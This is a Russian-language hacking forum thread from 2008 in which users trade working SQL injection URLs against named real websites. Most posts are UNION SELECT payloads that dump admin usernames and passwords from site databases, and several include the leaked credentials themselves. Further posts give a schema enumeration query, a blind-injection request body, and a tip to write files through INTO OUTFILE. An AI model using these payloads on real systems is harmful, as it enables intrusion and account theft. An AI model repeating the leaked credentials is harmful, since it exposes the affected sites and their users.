Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
24.04.2008, 03:45
|
|
Познающий
Регистрация: 23.03.2005
Сообщений: 40
Провел на форуме:
44404
Репутация:
13
|
|
Blind SQL/XPath injection for numeric inputs
http://www.video24.ru:80/PasswordRecovery.aspx
request data (post или get хз)
Код:
__EVENTTARGET=111-222-1933email@address.com&__EVENTARGUMENT=111-222-1933email@address.com&__VIEWSTATE=%2FwEPDwUJMzkxNjczNjExD2QWAmYPZBYEAgEPZBYIAgEPFgIeB2NvbnRlbnQFQFZpZGVvMjQgLSDQsNGA0LXQvdC00LAg0Lgg0L%2FQvtC60YPQv9C60LAg0LrQuNC90L4g0YTQuNC70YzQvNC%2B0LJkAgIPFgIfAAWAAtC60LjQvdC%2BINGE0LjQu9GM0LzRiyDRgdC60LDRh9Cw0YLRjCDQv9C%2B0YHQvNC%2B0YLRgNC10YLRjCDQsNGA0LXQvdC00LAg0LrRg9C%2F0LjRgtGMINGC0YDQtdC50LvQtdGA0Ysg0LrQvtC80LXQtNC40Lgg0LHQvtC10LLQuNC60Lgg0LzRg9C70YzRgtGE0LjQu9GM0LzRiyDRg9C20LDRgdGLICDRhNCw0L3RgtCw0YHRgtC40LrQsCDRjdGA0L7RgtC40LrQsCDRgdC10YDQuNCw0LvRiyDQsdC70L7QutCx0LDRgdGC0LXRgNGLINC%2F0YDQtdC80YzQtdGA0YtkAgMPFgIfAAX%2FAdC60LjQvdC%2BINGE0LjQu9GM0LzRiyDRgdC60LDRh9Cw0YLRjCDQv9C%2B0YHQvNC%2B0YLRgNC10YLRjCDQsNGA0LXQvdC00LAg0LrRg9C%2F0LjRgtGMINGC0YDQtdC50LvQtdGA0Ysg0LrQvtC80LXQtNC40Lgg0LHQvtC10LLQuNC60Lgg0LzRg9C70YzRgtGE0LjQu9GM0LzRiyDRg9C20LDRgdGLINGE0LDQvdGC0LDRgdGC0LjQutCwINGN0YDQvtGC0LjQutCwINGB0LXRgNC40LDQu9GLINCx0LvQvtC60LHQsNGB0YLQtdGA0Ysg0L%2FRgNC10LzRjNC10YDRi2QCBA8WAh8ABYMB0LrRg9C%2F0LjRgtGMINGE0LjQu9GM0Lwg0LDRgNC10L3QtNCwINGE0LjQu9GM0LzQsCDRgdC60LDRh9Cw0YLRjCDRhNC40LvRjNC8INC%2F0L7RgdC70LXQtNC90LjQtSDRhNC40LvRjNC80Ysg0L3QvtCy0YvQtSDRhNC40LvRjNC80YtkAgMPZBYQAgQPZBYCAgEPZBYCZg9kFgQCAQ8WAh4EVGV4dAXlAdCi0LDQutC%2B0Lkg0L%2FQvtC70YzQt9C%2B0LLQsNGC0LXQu9GMINC90LUg0YHRg9GJ0LXRgdGC0LLRg9C10YIuPGJyLz7Qn9C%2B0L%2FRgNC%2B0LHRg9C50YLQtSDQtdGJ0LUsINC40LvQuCDQvtCx0YDQsNGC0LjRgtC10YHRjCDQsiDRgdC70YPQttCx0YMg0YLQtdGF0L3QuNGH0LXRgdC60L7QuSA8YSBzdHlsZT0iY29sb3I6b3JhbmdlOyIgaHJlZj0iU3VwcG9ydC5hc3B4Ij7Qv9C%2B0LTQtNC10YDQttC60Lg8YT5kAgUPZBYEAgEPDxYCHghJbWFnZVVybAVNfi9DYXB0Y2hhSW1hZ2UuYXNweD9ndWlkPTdmY2E2MzdhNjcyYzRhMjZiOWNkYzMzYzkzODQwMTg2JndpZHRoPTIwMCZoZWlnaHQ9NzBkZAIDDw9kFgIeCm9ua2V5cHJlc3MFNnJldHVybiBjbGlja09uRW50ZXIodGhpcywnY3RsMDBfY3BoQ29udGVudF9SZWNvdmVyeScpO2QCBg8PFgIeB1Zpc2libGVnZBYEZg8WAh8BZWQCAQ8WAh8BBYUBPGlmcmFtZSBjbGFzcz0nJyBzdHlsZT0naGVpZ2h0OjIyMHB4O3dpZHRoOjE4MHB4OycgZnJhbWVib3JkZXI9MCBzY3JvbGxpbmc9bm8gc3JjPSdodHRwOi8vdmlkZW8yNC5ydS9kYXRhL2FkdnMvNi9pbmRleC5odG0nPjwvaWZyYW1lPmQCCA9kFgICAQ8WAh4LXyFJdGVtQ291bnQCChYUZg9kFgJmDxULACLQn9Cw0YDQuNC2LCDRjyDQu9GO0LHQu9GOINGC0LXQsdGPAzEwMAMxMDAi0J%2FQsNGA0LjQtiwg0Y8g0LvRjtCx0LvRjiDRgtC10LHRjwMxMDAi0J%2FQsNGA0LjQtiwg0Y8g0LvRjtCx0LvRjiDRgtC10LHRjwMxMDADMTAwCTQ5INGA0YPQsQk0OSDRgNGD0LFkAgEPZBYCZg8VCwRIaWdoI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIyAjIyI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIyI9CS0L3Rg9GC0YDQtdC90L3Rj9GPINC40LzQv9C10YDQuNGPAjIyAjIyCTQ5INGA0YPQsQk0OSDRgNGD0LFkAgIPZBYCZg8VCwAY0KPQu9GM0YLRgNCw0YTQuNC%
2B0LvQtdGCAjY3AjY3GNCj0LvRjNGC0YDQsNGE0LjQvtC70LXRggI2NxjQo9C70YzRgtGA0LDRhNC40L7Qu9C10YICNjcCNjcJNDkg0YDRg9CxCTQ5INGA0YPQsWQCAw9kFgJmDxULBEhpZ2gK0JLRi9C60YPQvwM0NzQDNDc0CtCS0YvQutGD0L8DNDc0CtCS0YvQutGD0L8DNDc0AzQ3NAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIED2QWAmYPFQsADtCg0YPRgdCw0LvQutCwAzE3MAMxNzAO0KDRg9GB0LDQu9C60LADMTcwDtCg0YPRgdCw0LvQutCwAzE3MAMxNzAJNDkg0YDRg9CxCTQ5INGA0YPQsWQCBQ9kFgJmDxULBEhpZ2gR0K8g0L7RgdGC0LDRjtGB0YwDMzY4AzM2OBHQryDQvtGB0YLQsNGO0YHRjAMzNjgR0K8g0L7RgdGC0LDRjtGB0YwDMzY4AzM2OAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIGD2QWAmYPFQsAJNCb0LjQutCy0LjQtNCw0YbQuNGPICjRgdC10YDQuNGPICAxKQM0NTMDNDUzJNCb0LjQutCy0LjQtNCw0YbQuNGPICjRgdC10YDQuNGPICAxKQM0NTMk0JvQuNC60LLQuNC00LDRhtC40Y8gKNGB0LXRgNC40Y8gIDEpAzQ1MwM0NTMJNDkg0YDRg9CxCTQ5INGA0YPQsWQCBw9kFgJmDxULBEhpZ2gs0J3QsNC%2F0LDQtNC10L3QuNC1INC90LAgMTMt0Lkg0YPRh9Cw0YHRgtC%2B0LoDNTQ4AzU0OCzQndCw0L%2FQsNC00LXQvdC40LUg0L3QsCAxMy3QuSDRg9GH0LDRgdGC0L7QugM1NDgs0J3QsNC%2F0LDQtNC10L3QuNC1INC90LAgMTMt0Lkg0YPRh9Cw0YHRgtC%2B0LoDNTQ4AzU0OAk0OSDRgNGD0LEJNDkg0YDRg9CxZAIID2QWAmYPFQsAJdCR0L7QuSDRgSDRgtC10L3RjNGOIDIgLSDQoNC10LLQsNC90YgCNDkCNDkl0JHQvtC5INGBINGC0LXQvdGM0Y4gMiAtINCg0LXQstCw0L3RiAI0OSXQkdC%2B0Lkg0YEg0YLQtdC90YzRjiAyIC0g0KDQtdCy0LDQvdGIAjQ5AjQ5CTQ5INGA0YPQsQk0OSDRgNGD0LFkAgkPZBYCZg8VCwRIaWdoH9Cg0L7QutC%2B0LLQsNGPINC60YDQsNGB0L7RgtC60LADNTI1AzUyNR%2FQoNC%2B0LrQvtCy0LDRjyDQutGA0LDRgdC%2B0YLQutCwAzUyNR%2FQoNC%2B0LrQvtCy0LDRjyDQutGA0LDRgdC%2B0YLQutCwAzUyNQM1MjUJNDkg0YDRg9CxCTQ5INGA0YPQsWQCCQ9kFgJmDxBkZBYAZAIKD2QWBGYPFgIfAWVkAgEPFgIfAWVkAgsPDxYCHwRnZGQCDA8PFgIfBGhkZAINDw8WBB8BBRLQmtC40L3QvtGC0LXQsNGC0YAeC05hdmlnYXRlVXJsBRhodHRwOi8vY2luZW1hLmxvY2FsaG9zdC9kZBgBBR9jdGwwMCRjcGhDb250ZW50JE11bHRpVmlld0Zvcm1zDw9kZmSgE12fR%2FaXraHX3N%2FRHjIlWVF1Dw%3D%3D&spos=111-222-1933email@address.com&ctl00%24SearchText=111-222-1933email@address.com+and+1%3D0&ctl00%24cphContent%24UserNameText=111-222-1933email@address.com&ctl00%24cphContent%24ctrlCaptcha%24tbCode=111-222-1933email@address.com&ctl00%24cphContent%24Recovery=111-222-1933email@address.com&__EVENTVALIDATION=%2FwEWCAKL55VmAsCH3ZkDAp3575QBAvTb06MHApf5r%2BgPAvKJmnkCvb2C%2BQkC9qacmAFWO%2BU%2BG8WwJuHrrDX%2BErr05%2B2fSQ%3D%3D
|
|
|
24.04.2008, 03:56
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.break-dance.it/pagine/italiano/forum/forums.php?id=-3+union+select+1,concat_ws(0x3a,user,password),3+f rom+users+limit+0,1/*
это чтото вроде админов или модеров но админку не нашёл ..
FrOz!:romanroman
FrA:mg2ymu
|
|
|
|
24.04.2008, 04:41
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698
Репутация:
1446
|
|
http://www.break-dance.it/pagine/italiano/community/log.php
|
|
|
|
24.04.2008, 07:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
помогите составить запрос, инекция после order и limit
SELECT p.*, a.id AS agentid, a.name AS agent, a.user AS user, c.name AS company, c.id AS companyid, t.name AS type, p.type AS typeid
FROM mos_hp_properties AS p, mos_hp_companies AS c
LEFT JOIN mos_hp_agents AS a ON p.agent = a.id
LEFT JOIN mos_hp_prop_types AS t ON p.type = t.id
LEFT JOIN mos_hp_featured AS f ON f.property = p.id
WHERE p.published='1' AND p.approved='1' AND t.published='1'
AND a.company=c.id
AND (publish_up = '0000-00-00 00:00:00' OR publish_up <= NOW())
AND (publish_down = '0000-00-00 00:00:00' OR publish_down >= NOW())
AND (p.name LIKE '%1%' OR p.address LIKE '%1%' OR p.suburb LIKE '%1%'
OR p.state LIKE '%1%' OR p.country LIKE '%1%' OR p.intro_text LIKE '%1%'
OR p.full_text LIKE '%1%')
AND p.type=1
ORDER BY p.price asc
LIMIT [sql]
|
|
|
|
24.04.2008, 09:32
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
После ORDER и LIMIT можно попробовать INTO OUTFILE '/path/to/file'
|
|
|
|
24.04.2008, 12:54
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
хз вроде движок какого-то онлайн магазина:
Код:
http://www.odissey.kiev.ua/index.php?fullnews=-1+union+select+1,2,3,4,5/*
Код:
http://shop.ghettostreet.ru/index.php?fullnews=-1+union+select+1,2,3,4,5/*
админка по адресу хттп://сайт/admin/ |
|
|
|
24.04.2008, 15:02
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.macspeech.com/
Код:
http://www.macspeech.com/pages.php?pID=-1+union+select+concat(admin_email_address,0x3a,admin_password)+from+admin/*
PR: 7
|
|
|
|
24.04.2008, 16:23
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Код:
http://www.filmthreat.com/index.php?section=reviews&Id=9999999999999'/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,concat_ws(0x3a,user,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user+limit+0,1/*
5.0.27
by admin:4ba58ad82e059055
Код:
http://innovateonline.info/index.php?view=article&id=999999999/**/UNION/**/SELECT/**/version()/*
5.0.24a-community-nt |
|
|
|
24.04.2008, 20:28
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
Код:
https://www.lina2.ru/clans/index.php?showclan=-1+union+select+login,password+from+accounts/*
login:pass
парль зашифрован
base64_encode(pack('H*'sha1($apss)))
Схема БД(спасибо Scipio):
Код:
http://www.lina2.ru/clans/index.php?showclan=-268520741+union+select+concat(table_schema,0x3a,ta ble_name,0x3a,column_name),null+from+information_s chema.columns+where+table_schema+like+0x6C3225/*
|
|
|
|
24.04.2008, 22:25
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://it.festivalbar.music.yahoo.net/forum/view.php?id=23329+and+1=0+union+select+1,version() ,3,4,5,6,7,8,9,0,1,2,3/*
4.1.20-log
кроме таблы news - ничего не нашёл .. пробил на 450 табл ..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
